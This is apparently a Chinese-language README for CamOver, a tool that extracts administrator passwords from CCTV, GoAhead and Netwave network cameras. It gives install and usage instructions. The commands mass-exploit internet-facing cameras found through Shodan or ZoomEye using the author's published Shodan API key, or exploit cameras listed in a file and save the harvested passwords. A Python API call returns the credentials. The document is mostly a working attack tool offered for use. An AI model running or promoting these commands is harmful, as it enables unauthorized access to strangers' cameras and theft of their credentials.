CamOver 是一款摄像头利用工具,能够泄露网络摄像头的管理员密码。
CCTV、GoAhead 和 Netwave。pip3 install git+https://github.com/EntySec/CamOver
要使用 CamOver,只需在终端中键入 camover。
usage: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN]
[--zoomeye ZOOMEYE] [-p PAGES]
CamOver 是一款摄像头利用工具,能够泄露网络摄像头的管理员密码。
optional arguments:
-h, --help 显示此帮助信息并退出
-t, --threads 使用线程以获得最快的工作速度。
-o OUTPUT, --output OUTPUT
将结果输出到文件。
-i INPUT, --input INPUT
输入地址文件。
-a ADDRESS, --address ADDRESS
单个地址。
--shodan SHODAN Shodan API 密钥,用于利用互联网上的设备。
--zoomeye ZOOMEYE ZoomEye API 密钥,用于利用互联网上的设备。
-p PAGES, --pages PAGES
你想从 ZoomEye 获取的页数。
利用单个摄像头
让我们为了好玩而黑掉我的摄像头。
camover -a 192.168.99.100
利用互联网上的摄像头
让我们尝试使用 Shodan 搜索引擎来利用互联网上的摄像头,我们将使用 -t 进行快速利用。
camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
注意: 给出的 Shodan API 密钥 (PSKINdQe1GyxGgecYz2191H2JoS9qvgD) 是我的 PRO API 密钥,你可以使用此密钥或你自己的密钥,免费使用我们所有的资源 :)
从输入文件利用摄像头
让我们尝试使用开放的摄像头数据库,并使用 -t 进行快速利用。
camover -t -i cameras.txt -o passwords.txt
注意: 它将利用 cameras.txt 列表中的所有摄像头(通过其地址),并将所有获得的密码保存到 passwords.txt 中。
CamOver 也有自己的 Python API,可以通过将 CamOver 导入到你的代码中来调用。
from camover import CamOver
以下是 CamOver 的所有基本函数,可用于利用指定的摄像头。
exploit(address) - 利用给定地址的单个摄像头。利用单个摄像头
from camover import CamOver
camover = CamOver()
creds = camover.exploit('192.168.99.100')
print(creds)